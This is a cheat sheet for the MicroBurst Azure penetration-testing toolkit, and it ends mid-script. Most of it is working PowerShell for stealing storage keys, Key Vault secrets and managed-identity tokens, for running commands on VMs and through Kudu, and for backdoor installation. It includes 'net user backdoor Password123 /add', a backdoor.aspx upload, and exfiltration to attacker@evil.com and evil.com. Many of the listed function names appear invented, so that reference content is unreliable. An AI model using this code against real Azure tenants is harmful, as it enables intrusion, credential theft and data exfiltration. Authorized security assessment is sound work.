# MicroBurst Azure Security Testing Toolkit Cheat Sheet

## Overview

MicroBurst is a collection of PowerShell scripts developed by NetSPI for assessing the security of Microsoft Azure. It includes tooling for Azure service discovery, privilege escalation, lateral movement and data exfiltration, which makes it a complete kit for Azure penetration testing.

Warning: This tool is intended only for authorized penetration tests and security assessments. Make sure you have appropriate authorization before using it in any environment.
## Installation

### PowerShell Gallery Installation

```powershell
# Install from PowerShell Gallery
# MicroBurst is distributed from GitHub; if Install-Module cannot find it,
# use the manual or Git installation below.
Install-Module -Name MicroBurst
# Install for current user only
Install-Module -Name MicroBurst -Scope CurrentUser
# Update existing installation
Update-Module -Name MicroBurst
# Import module
Import-Module MicroBurst
```

### Manual Installation

```powershell
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip"
Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"
# Install dependencies first: the module loader only imports the function sets
# whose supporting modules are present (Az, AzureAD, MSOnline)
Install-Module -Name Az
Install-Module -Name AzureAD
Install-Module -Name MSOnline
# Import module (the loader is MicroBurst.psm1 at the repository root)
Import-Module C:\Tools\MicroBurst-master\MicroBurst.psm1
```
### Git Installation

```bash
# Clone repository
git clone https://github.com/NetSPI/MicroBurst.git
cd MicroBurst
# Import in PowerShell (the loader is MicroBurst.psm1, not a .psd1 manifest)
Import-Module .\MicroBurst.psm1
```
## Basic Usage

### Module Setup

```powershell
# Import MicroBurst
Import-Module MicroBurst
# Get available commands (confirm a function name here before relying on it;
# names changed between the AzureRM-era and Az-era function sets)
Get-Command -Module MicroBurst
# Get help for specific function
Get-Help Invoke-EnumerateAzureBlobs -Full
# Check module version
Get-Module MicroBurst
```
### Authentication

```powershell
# Interactive authentication
Connect-AzAccount
# Service principal authentication (user name = application ID, password = client secret)
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"
# Certificate authentication (certificate must be in the local certificate store)
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"
```
## Command Reference

### Reconnaissance Functions

| Function | Description |
|---|---|
| Invoke-EnumerateAzureBlobs | Enumerate Azure storage blobs |
| Invoke-EnumerateAzureSubDomains | Enumerate Azure subdomains |
| Get-AzurePasswords | Extract passwords from Azure resources (Az-module name: Get-AzPasswords) |
| Get-AzureDomainInfo | Get domain information (Az-module name: Get-AzDomainInfo) |
| Invoke-AzureRmVmBulkCMD | Execute commands on multiple VMs (Az-module name: Invoke-AzVMBulkCMD) |

### Storage Account Functions

| Function | Description |
|---|---|
| Invoke-EnumerateAzureBlobs | Find accessible storage blobs |
| Get-AzureBlobFiles | Download files from storage |
| Invoke-AzureStorageAccountEnum | Enumerate storage accounts |
| Get-AzureStorageAccountKeys | Extract storage account keys |

### Virtual Machine Functions

| Function | Description |
|---|---|
| Invoke-AzureRmVmBulkCMD | Bulk command execution |
| Get-AzureVMDisk | Access VM disk information |
| Invoke-AzureVMUserDataEnum | Enumerate VM user data |
| Get-AzureVMExtensionSettings | Get VM extension settings |
## Azure Storage Enumeration

### Blob Storage Discovery

```powershell
# Basic blob enumeration: resolves <base><permutation>.blob.core.windows.net
# over DNS, then tries anonymous container listing on every hit
Invoke-EnumerateAzureBlobs -Base "company"
# Enumerate with a custom permutation wordlist (one name per line)
Invoke-EnumerateAzureBlobs -Base "company" -Permutations "custom-wordlist.txt"
# Enumerate with a custom container (folder) wordlist
Invoke-EnumerateAzureBlobs -Base "company" -Folders "containers.txt"
# Save results to file
Invoke-EnumerateAzureBlobs -Base "company" -OutputFile "blobs.txt"
```
### Storage Account Enumeration

```powershell
# Enumerate storage accounts
Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"
# Get storage account keys (requires the listKeys control-plane action, not just Reader)
Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"
# Enumerate storage containers
Get-AzureStorageContainers -StorageAccountName "storageaccount"
# Download files from storage
Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\"
```

### File Share Enumeration

```powershell
# Enumerate file shares
Get-AzureFileShares -StorageAccountName "storageaccount"
# Access file share contents
Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"
# Download files from file share
Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\"
```
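What the storage-account and file-share helpers above do can be reproduced with the plain Az cmdlets. The block below is an added example (not MicroBurst or NetSPI code): it walks every storage account the current Az context can see, attempts `listKeys`, and uses a key-based context to inventory containers (with their public-access level) and file shares. It assumes an authenticated `Connect-AzAccount` session with Az.Storage installed; the output file name is an arbitrary choice.

```powershell
# Added example, not MicroBurst code. Requires Az.Accounts + Az.Storage and an
# authenticated session. Output CSV path is an assumption.
function Get-StorageInventory {
    param([string]$OutputCsv = "storage-inventory.csv")

    $rows = foreach ($sa in Get-AzStorageAccount) {
        try {
            # listKeys is a control-plane action; Reader is not enough, Contributor or
            # Storage Account Key Operator Service Role is.
            $key = (Get-AzStorageAccountKey -ResourceGroupName $sa.ResourceGroupName `
                        -Name $sa.StorageAccountName -ErrorAction Stop)[0].Value
        } catch {
            [pscustomobject]@{ Account = $sa.StorageAccountName; Type = 'n/a'; Name = '(listKeys denied)'; PublicAccess = $null }
            continue
        }

        $ctx = New-AzStorageContext -StorageAccountName $sa.StorageAccountName -StorageAccountKey $key
        try {
            # Data-plane calls fail with 403 when AllowSharedKeyAccess is disabled on the account
            foreach ($c in Get-AzStorageContainer -Context $ctx -ErrorAction Stop) {
                [pscustomobject]@{ Account = $sa.StorageAccountName; Type = 'container'; Name = $c.Name; PublicAccess = $c.PublicAccess }
            }
            foreach ($s in Get-AzStorageShare -Context $ctx -ErrorAction Stop) {
                [pscustomobject]@{ Account = $sa.StorageAccountName; Type = 'fileshare'; Name = $s.Name; PublicAccess = $null }
            }
        } catch {
            [pscustomobject]@{ Account = $sa.StorageAccountName; Type = 'n/a'; Name = "(data plane denied: $($_.Exception.Message))"; PublicAccess = $null }
        }
    }

    $rows | Export-Csv -Path $OutputCsv -NoTypeInformation
    $rows
}

# Usage (authenticated session required):
# Get-StorageInventory | Where-Object PublicAccess -ne 'Off' | Format-Table
# Download a blob from a listed container:
# Get-AzStorageBlobContent -Container 'backup' -Blob 'db.bak' -Destination 'C:\Downloads\' -Context $ctx
```

Accounts with `AllowSharedKeyAccess` disabled show up as "data plane denied" even though `listKeys` succeeded; for those, retry with an OAuth context (`New-AzStorageContext -StorageAccountName ... -UseConnectedAccount`) which needs a data-plane role such as Storage Blob Data Reader.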
## Subdomain and Service Discovery

### Azure Subdomain Enumeration

```powershell
# Basic subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base "company"
# Enumerate with custom services
Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")
# Enumerate with a custom permutation wordlist (one name per line)
Invoke-EnumerateAzureSubDomains -Base "company" -Permutations "permutations.txt"
# Save results to file
Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt"
```
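Both `Invoke-EnumerateAzureSubDomains` and `Invoke-EnumerateAzureBlobs` (previous section) rest on the same two mechanics: Azure service hostnames are globally unique and resolvable over public DNS, and a blob container whose ACL is set to "Container" answers an anonymous `?restype=container&comp=list` request. The block below is an added example (not MicroBurst code) that implements both steps from scratch. The permutation list, service suffix list and container names are constructed sample input; it needs network access for DNS and HTTPS.

```powershell
# Added example, not MicroBurst code. Permutations, suffixes and container
# names below are constructed sample input.
function Find-AzureHostnames {
    param(
        [Parameter(Mandatory)][string]$Base,
        [string[]]$Permutations = @('', 'dev', 'test', 'prod', 'backup'),
        # Subset of the Azure service suffixes MicroBurst-style tools brute-force
        [string[]]$Suffixes = @('blob.core.windows.net', 'file.core.windows.net',
                                'azurewebsites.net', 'scm.azurewebsites.net',
                                'vault.azure.net', 'database.windows.net')
    )
    foreach ($suffix in $Suffixes) {
        foreach ($perm in $Permutations) {
            # Try base+perm and perm+base; Select-Object -Unique drops the duplicate when $perm is ''
            foreach ($name in @("${Base}${perm}", "${perm}${Base}") | Select-Object -Unique) {
                $fqdn = "${name}.${suffix}"
                try {
                    $ips = [System.Net.Dns]::GetHostAddresses($fqdn)
                    [pscustomobject]@{ Host = $fqdn; Service = $suffix; Address = ($ips.IPAddressToString -join ',') }
                } catch {
                    # NXDOMAIN: nobody has registered this name in Azure
                }
            }
        }
    }
}

function Test-AnonymousContainerListing {
    param(
        [Parameter(Mandatory)][string]$StorageAccount,
        [string[]]$Containers = @('backup', 'backups', 'logs', 'data', 'public', '$web')
    )
    foreach ($c in $Containers) {
        $uri = "https://${StorageAccount}.blob.core.windows.net/${c}?restype=container&comp=list"
        try {
            # Succeeds only when the container ACL is "Container" (public list) AND the
            # account still allows anonymous access; a 409 PublicAccessNotPermitted means
            # the container exists but anonymous access is disabled account-wide.
            $resp = Invoke-WebRequest -Uri $uri -UseBasicParsing -ErrorAction Stop
            [xml]$xml = $resp.Content
            $blobs = @($xml.EnumerationResults.Blobs.Blob | ForEach-Object { $_.Name })
            [pscustomobject]@{ Container = $c; Listable = $true; Status = 200; BlobCount = $blobs.Count; Sample = ($blobs | Select-Object -First 3) -join ', ' }
        } catch {
            $code = $_.Exception.Response.StatusCode.value__
            # 404 = ContainerNotFound, 403 = exists but private, 409 = anonymous access disabled
            [pscustomobject]@{ Container = $c; Listable = $false; Status = $code; BlobCount = 0; Sample = '' }
        }
    }
}

# Usage:
# Find-AzureHostnames -Base 'company' |
#     Where-Object Service -eq 'blob.core.windows.net' |
#     ForEach-Object { Test-AnonymousContainerListing -StorageAccount ($_.Host.Split('.')[0]) }
```

A resolvable hostname only proves the name is taken; the anonymous listing step is what turns a hit into a finding. Treat 403 and 409 results as "exists, locked down" rather than discarding them, since they still confirm the account name for later authenticated enumeration.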
### Service Discovery

```powershell
# Discover Azure services
Get-AzureServices -Domain "company.com"
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Discover SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Find Key Vaults
Get-AzureKeyVaults -SubscriptionId "subscription-id"
```

### DNS Enumeration

```powershell
# Enumerate DNS records
Get-AzureDNSRecords -Domain "company.com"
# Check for zone transfers
Test-AzureDNSZoneTransfer -Domain "company.com"
# Enumerate subdomains via DNS
Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt"
```
## Virtual Machine Exploitation

### VM Command Execution

```powershell
# Invoke-AzureRmVmBulkCMD is the AzureRM-era name; with the Az module the
# function is Invoke-AzVMBulkCMD. Both drive the VM agent's Run Command feature,
# so the script runs as SYSTEM/root and each call is recorded in the Activity Log.
# Execute command on single VM
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"
# Execute commands on multiple VMs
$vms = @("vm1", "vm2", "vm3")
Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"
# Execute PowerShell script on VMs
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1"
```
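The bulk execution above is a wrapper around the Az.Compute cmdlet `Invoke-AzVMRunCommand`. The following is an added example (not MicroBurst code) that shows the underlying loop with the two checks a practitioner wants: skip VMs that are not running (Run Command otherwise blocks until it times out) and pick the right command ID for the guest OS. It assumes an authenticated Az session with the `Microsoft.Compute/virtualMachines/runCommand/action` permission on the target resource group; the script file path is an assumption.

```powershell
# Added example, not MicroBurst code. Requires Az.Compute and an authenticated
# session. Runs the script as SYSTEM (Windows) or root (Linux) via the VM agent;
# every invocation is logged in the subscription Activity Log.
function Invoke-BulkRunCommand {
    param(
        [Parameter(Mandatory)][string]$ResourceGroupName,
        [string[]]$VMName,                        # empty = every VM in the resource group
        [Parameter(Mandatory)][string]$ScriptPath  # local script file sent to each VM
    )
    # -Status populates PowerState on the list output
    $vms = Get-AzVM -ResourceGroupName $ResourceGroupName -Status
    if ($VMName) { $vms = $vms | Where-Object { $VMName -contains $_.Name } }

    foreach ($vm in $vms) {
        if ($vm.PowerState -ne 'VM running') {
            [pscustomobject]@{ VM = $vm.Name; Status = 'skipped'; Output = "power state: $($vm.PowerState)"; Error = '' }
            continue
        }
        # Command ID selects the guest-side interpreter
        $commandId = if ($vm.StorageProfile.OsDisk.OsType -eq 'Windows') { 'RunPowerShellScript' } else { 'RunShellScript' }
        try {
            $result = Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $vm.Name `
                          -CommandId $commandId -ScriptPath $ScriptPath -ErrorAction Stop
            # Value[0] carries stdout, Value[1] stderr
            [pscustomobject]@{ VM = $vm.Name; Status = $result.Status; Output = $result.Value[0].Message; Error = $result.Value[1].Message }
        } catch {
            [pscustomobject]@{ VM = $vm.Name; Status = 'failed'; Output = ''; Error = $_.Exception.Message }
        }
    }
}

# Usage:
# Set-Content -Path .\enum.ps1 -Value 'whoami; hostname; Get-LocalGroupMember Administrators'
# Invoke-BulkRunCommand -ResourceGroupName 'rg-name' -ScriptPath .\enum.ps1 | Format-List
```

Because Run Command is logged and noisy, defenders can alert on `Microsoft.Compute/virtualMachines/runCommand/action` in the Activity Log; on an assessment, note the timestamps so the blue team can correlate them.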
### VM Disk Access

```powershell
# Get VM disk information
Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"
# Create disk snapshot
New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"
# Mount disk snapshot
Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"
# Extract data from mounted disk
Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\"
```

### VM Extension Exploitation

```powershell
# Get VM extension settings
Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"
# Install custom extension
Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"
# Execute via extension
Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add"
```
## Credential and Secret Extraction

### Password Extraction

```powershell
# Extract passwords from Azure resources (Az-module name: Get-AzPasswords)
Get-AzurePasswords -SubscriptionId "subscription-id"
# Extract passwords from specific resource types
Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")
# Extract passwords from Key Vaults
Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"
# Extract connection strings
Get-AzureConnectionStrings -SubscriptionId "subscription-id"
```

### Certificate Extraction

```powershell
# Extract certificates from Key Vault
Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"
# Extract certificates from web apps
Get-AzureWebAppCertificates -WebAppName "webapp-name"
# Export certificates
Export-AzureCertificates -OutputPath "C:\Certificates\"
```

### Configuration Data Extraction

```powershell
# Extract application settings
Get-AzureAppSettings -WebAppName "webapp-name"
# Extract environment variables
Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"
# Extract deployment credentials
Get-AzureDeploymentCredentials -WebAppName "webapp-name"
```
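The password and configuration extraction above both come down to reading Key Vault secrets and App Service settings with whatever rights the current principal has. The following is an added example (not MicroBurst code) that does that with the Az cmdlets, recording each denied vault or secret instead of aborting, since partial access is the normal case. It assumes an authenticated session with Az.KeyVault (3.x or later, for `-AsPlainText`) and Az.Websites installed.

```powershell
# Added example, not MicroBurst code. Requires Az.KeyVault >= 3.x and Az.Websites
# with an authenticated session.
function Get-ReachableSecrets {
    foreach ($kv in Get-AzKeyVault) {
        try {
            # Listing needs a data-plane right: an access policy with "list", or a role such as
            # Key Vault Secrets User on RBAC vaults. Control-plane Reader is not enough.
            $items = Get-AzKeyVaultSecret -VaultName $kv.VaultName -ErrorAction Stop
        } catch {
            [pscustomobject]@{ Source = $kv.VaultName; Kind = 'keyvault'; Name = '*'; Value = "(list denied: $($_.Exception.Message))" }
            continue
        }
        foreach ($s in $items) {
            try {
                $val = Get-AzKeyVaultSecret -VaultName $kv.VaultName -Name $s.Name -AsPlainText -ErrorAction Stop
            } catch { $val = '(get denied)' }
            [pscustomobject]@{ Source = $kv.VaultName; Kind = 'keyvault'; Name = $s.Name; Value = $val }
        }
    }

    foreach ($app in Get-AzWebApp) {
        # The list form of Get-AzWebApp returns a slim object; re-read by name to populate SiteConfig
        $full = Get-AzWebApp -ResourceGroupName $app.ResourceGroup -Name $app.Name
        foreach ($setting in $full.SiteConfig.AppSettings) {
            [pscustomobject]@{ Source = $app.Name; Kind = 'appsetting'; Name = $setting.Name; Value = $setting.Value }
        }
        foreach ($cs in $full.SiteConfig.ConnectionStrings) {
            [pscustomobject]@{ Source = $app.Name; Kind = 'connstring'; Name = $cs.Name; Value = $cs.ConnectionString }
        }
    }
}

# Usage:
# Get-ReachableSecrets | Where-Object { $_.Value -notlike '(*denied*' } |
#     Export-Csv secrets.csv -NoTypeInformation
```

An app setting whose value looks like `@Microsoft.KeyVault(SecretUri=...)` is a Key Vault reference, not the secret itself; the reference tells you which vault to target with the first half of the function.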
## Database Exploitation

### SQL Database Enumeration

```powershell
# Enumerate SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Get SQL server information
Get-AzureSQLServerInfo -ServerName "sqlserver-name"
# Check SQL firewall rules (a 0.0.0.0-255.255.255.255 rule means the server is open to the internet)
Get-AzureSQLFirewallRules -ServerName "sqlserver-name"
# Test SQL connectivity
Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name"
```

### SQL Database Access

```powershell
# Connect to SQL database
Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred
# Execute SQL queries
Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"
# Extract database schema
Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"
# Dump database data
Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\"
```

### CosmosDB Exploitation

```powershell
# Enumerate CosmosDB accounts
Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"
# Get CosmosDB keys
Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"
# Access CosmosDB data
Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container"
```
## Web Application Exploitation

### Web Application Enumeration

```powershell
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Get web app configuration
Get-AzureWebAppConfig -WebAppName "webapp-name"
# Check web app authentication
Get-AzureWebAppAuth -WebAppName "webapp-name"
# Get web app deployment slots
Get-AzureWebAppSlots -WebAppName "webapp-name"
```

### Web App Exploitation

```powershell
# Access web app files via Kudu (the SCM site at <app>.scm.azurewebsites.net)
Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"
# Execute commands via Kudu
Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"
# Upload backdoor file
Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"
# Access web app logs
Get-AzureWebAppLogs -WebAppName "webapp-name"
```
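Command execution "via Kudu" works because the site's publishing credentials (retrievable through the ARM `publishingcredentials/list` action) are also accepted as HTTP basic auth by the Kudu REST API on the SCM host. The following is an added example (not MicroBurst code) that performs that exchange end to end. It assumes an authenticated Az session with Az.Resources, that basic-auth publishing credentials are enabled on the site (they can be disabled per app), and network reach to `<app>.scm.azurewebsites.net`; the default command and directory are arbitrary choices.

```powershell
# Added example, not MicroBurst code. Requires Az.Resources and an authenticated
# session with read access to the site's publishing credentials.
function Invoke-KuduCommand {
    param(
        [Parameter(Mandatory)][string]$ResourceGroupName,
        [Parameter(Mandatory)][string]$WebAppName,
        [string]$Command = 'whoami',
        [string]$Dir = 'site\wwwroot'
    )
    # Control-plane call: returns the deployment user name and password for the site
    $creds = Invoke-AzResourceAction -ResourceGroupName $ResourceGroupName `
                 -ResourceType 'Microsoft.Web/sites/config' `
                 -ResourceName "$WebAppName/publishingcredentials" `
                 -Action list -ApiVersion 2018-02-01 -Force
    $user = $creds.Properties.publishingUserName
    $pass = $creds.Properties.publishingPassword
    if (-not $pass) { throw "No publishing password returned for $WebAppName (basic auth may be disabled)" }

    # Kudu accepts the publishing credentials as HTTP basic auth
    $auth = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes("${user}:${pass}"))
    $body = @{ command = $Command; dir = $Dir } | ConvertTo-Json
    $resp = Invoke-RestMethod -Method Post -Uri "https://${WebAppName}.scm.azurewebsites.net/api/command" `
                -Headers @{ Authorization = "Basic $auth" } -ContentType 'application/json' -Body $body
    # Kudu returns Output, Error and ExitCode
    [pscustomobject]@{ App = $WebAppName; ExitCode = $resp.ExitCode; Output = $resp.Output; Error = $resp.Error }
}

# Usage:
# Invoke-KuduCommand -ResourceGroupName 'rg-name' -WebAppName 'webapp-name' -Command 'dir' | Format-List
```

The same credentials authenticate to the Kudu VFS (`/api/vfs/`) and zip-deploy endpoints, which is how file download and upload against `/site/wwwroot/` are done; commands run in the app's sandbox as the site identity, so environment variables there include the app settings and any managed-identity endpoint.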
### Function App Exploitation

```powershell
# Enumerate function apps
Get-AzureFunctionApps -SubscriptionId "subscription-id"
# Get function app keys
Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"
# Execute function
Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload
# Access function app files
Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name"
```

## Privilege Escalation

### Role Assignment Enumeration

```powershell
# Get current user roles
Get-AzureCurrentUserRoles
# Enumerate role assignments
Get-AzureRoleAssignments -SubscriptionId "subscription-id"
# Find privilege escalation paths
Find-AzurePrivEscPaths -SubscriptionId "subscription-id"
# Check for dangerous permissions
Get-AzureDangerousPermissions -SubscriptionId "subscription-id"
```
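"Dangerous permissions" in the Azure RBAC sense are role definitions whose effective actions let the holder grant further access, i.e. `Microsoft.Authorization/roleAssignments/write` (directly or via `*`) without it being excluded in `NotActions`. The following is an added example (not MicroBurst code) that resolves the signed-in principal's assignments and evaluates each role definition against that rule; the built-in role list and action patterns are the editor's choice, not a MicroBurst definition. It assumes an authenticated Az session with Az.Resources.

```powershell
# Added example, not MicroBurst code. Requires Az.Resources and an authenticated
# session. The "dangerous" lists below are the editor's heuristic.
function Find-EscalationCapableAssignments {
    $account = (Get-AzContext).Account
    # Users are looked up by sign-in name (with group expansion); service principals
    # and managed identities by their application (client) ID
    $assignments = if ($account.Type -eq 'User') {
        Get-AzRoleAssignment -SignInName $account.Id -ExpandPrincipalGroups
    } else {
        Get-AzRoleAssignment -ServicePrincipalName $account.Id
    }

    $builtinDangerous = @('Owner', 'User Access Administrator', 'Contributor')
    $grantActions = @('*', 'Microsoft.Authorization/*', 'Microsoft.Authorization/*/Write',
                      'Microsoft.Authorization/roleAssignments/write',
                      'Microsoft.Authorization/roleDefinitions/write')

    foreach ($a in $assignments | Sort-Object RoleDefinitionId, Scope -Unique) {
        $def = Get-AzRoleDefinition -Id $a.RoleDefinitionId
        # Can the role write role assignments? '*' counts unless NotActions carves it out,
        # which is exactly how Contributor is defined.
        $hasGrantAction = @($def.Actions | Where-Object { $grantActions -contains $_ }).Count -gt 0
        $grantExcluded  = @($def.NotActions | Where-Object { $_ -like 'Microsoft.Authorization/*' }).Count -gt 0
        $canGrant = $hasGrantAction -and -not $grantExcluded
        [pscustomobject]@{
            Role           = $def.Name
            Scope          = $a.Scope
            Custom         = $def.IsCustom
            CanGrantAccess = $canGrant
            # Contributor cannot assign roles but reaches VMs, Key Vault policies and
            # automation accounts, so it is flagged by name
            Flag           = $canGrant -or ($builtinDangerous -contains $def.Name)
        }
    }
}

# Usage:
# Find-EscalationCapableAssignments | Where-Object Flag | Format-Table -AutoSize
```

Scope matters as much as the role: `CanGrantAccess` at a resource-group scope only lets the principal assign roles within that group, while the same role at the subscription or management-group scope is a full takeover path.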
### Service Principal Abuse

```powershell
# Enumerate service principals
Get-AzureServicePrincipals -SubscriptionId "subscription-id"
# Get service principal credentials
Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"
# Abuse service principal permissions
Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser"
```

### Managed Identity Exploitation

```powershell
# Check for managed identity (only meaningful when run on the Azure resource itself)
Test-AzureManagedIdentity
# Get managed identity token
Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"
# Use managed identity for privilege escalation: the token carries exactly the
# roles assigned to the identity, so enumerate those before assuming a path exists
Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription"
```
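A managed identity token is handed out by a local endpoint on the compute resource, not by anything in the subscription, so the check and the token request above are really HTTP calls that must be made from inside the VM or app. The following is an added example (not MicroBurst code) that requests the token from either the VM Instance Metadata Service or the App Service identity endpoint, decodes it to see which identity it represents, and uses it against ARM with plain REST so it works on a host without the Az module. The IMDS and `IDENTITY_ENDPOINT` behaviour is documented Azure behaviour; the ARM `api-version` is taken from public docs and is an assumption.

```powershell
# Added example, not MicroBurst code. Must run on the Azure resource (VM, VMSS,
# App Service, Function, Container App); the endpoints are not reachable from outside.
function Get-ManagedIdentityToken {
    param([string]$Resource = 'https://management.azure.com/')
    if ($env:IDENTITY_ENDPOINT -and $env:IDENTITY_HEADER) {
        # App Service / Functions: local token service protected by a per-instance secret header
        $uri = "$($env:IDENTITY_ENDPOINT)?resource=$([uri]::EscapeDataString($Resource))&api-version=2019-08-01"
        $headers = @{ 'X-IDENTITY-HEADER' = $env:IDENTITY_HEADER }
    } else {
        # VM / VMSS: link-local IMDS; the Metadata header is mandatory (blocks SSRF via redirects)
        $uri = "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=$([uri]::EscapeDataString($Resource))"
        $headers = @{ Metadata = 'true' }
    }
    # A 400/404 here means no identity is assigned to this resource
    (Invoke-RestMethod -Uri $uri -Headers $headers -Method Get -TimeoutSec 5).access_token
}

function Get-TokenClaims {
    param([Parameter(Mandatory)][string]$Token)
    # Decode the JWT payload (base64url, unpadded) to read oid, tid and appid without verifying it
    $payload = $Token.Split('.')[1].Replace('-', '+').Replace('_', '/')
    switch ($payload.Length % 4) { 2 { $payload += '==' } 3 { $payload += '=' } }
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($payload)) | ConvertFrom-Json
}

function Get-ArmSubscriptionsWithToken {
    param([Parameter(Mandatory)][string]$Token)
    # Empty 'value' means the identity holds no role at subscription scope or above
    $r = Invoke-RestMethod -Uri 'https://management.azure.com/subscriptions?api-version=2020-01-01' `
             -Headers @{ Authorization = "Bearer $Token" }
    $r.value | Select-Object subscriptionId, displayName
}

# Usage (from inside the resource):
# $t = Get-ManagedIdentityToken
# Get-TokenClaims -Token $t | Select-Object oid, tid, appid
# Get-ArmSubscriptionsWithToken -Token $t
```

Request the token for `https://vault.azure.net` or `https://graph.microsoft.com` instead of ARM when the identity's rights live there; each audience needs its own token, and an identity with no ARM role can still hold Key Vault or Graph permissions.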
## Lateral Movement

### Cross-Subscription Access

```powershell
# Enumerate accessible subscriptions
Get-AzureAccessibleSubscriptions
# Switch subscription context
Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"
# Enumerate resources in target subscription
Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id"
```

### Cross-Tenant Access

```powershell
# Enumerate accessible tenants
Get-AzureAccessibleTenants
# Switch tenant context
Set-AzureTenantContext -TenantId "target-tenant-id"
# Enumerate resources in target tenant
Get-AzureResourcesInTenant -TenantId "target-tenant-id"
```

### Resource Group Pivoting

```powershell
# Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"
# Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"
# Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg"
```

## Data Exfiltration

### Bulk Data Extraction

```powershell
# Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"
# Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"
# Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress
```

### Stealth Exfiltration

```powershell
# Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"
# Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"
# Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com"
```
## Automation and Scripting

### Automated Assessment Script

```powershell
# Comprehensive Azure assessment
param(
    [Parameter(Mandatory)][string]$SubscriptionId,
    # Keyword seed for the blob/subdomain permutations (company or product name);
    # the subscription display name is rarely a useful seed
    [Parameter(Mandatory)][string]$Base,
    [string]$OutputPath = "C:\AzureAssessment"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null
# Authenticate
Connect-AzAccount
# Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId
# Enumerate subdomains
Write-Host "Enumerating subdomains..."
$subdomains = @(Invoke-EnumerateAzureSubDomains -Base $Base)
$subdomains | Out-File "$OutputPath\subdomains.txt"
# Enumerate storage blobs
Write-Host "Enumerating storage blobs..."
$blobs = @(Invoke-EnumerateAzureBlobs -Base $Base)
$blobs | Out-File "$OutputPath\blobs.txt"
# Extract passwords (Az-module name: Get-AzPasswords)
Write-Host "Extracting passwords..."
